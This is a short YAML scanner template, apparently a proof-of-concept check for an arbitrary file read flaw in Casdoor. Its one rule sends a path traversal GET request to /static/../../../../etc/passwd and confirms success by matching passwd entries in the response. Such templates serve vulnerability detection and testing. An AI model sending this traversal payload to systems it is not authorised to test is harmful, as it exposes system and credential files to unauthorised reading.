id: casdoor-fileread

info:
  name: casdoor 任意文件读取
  author: qwtd
  severity: high
  verified: true
  description: |
    casdoor 存在任意文件读取漏洞，攻击者成功利用该漏洞，可实现任意文件读取，获取敏感信息。

rules:
  r0:
    request:
      method: GET
      path: /static/../../../../../../../../../../../etc/passwd
    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0()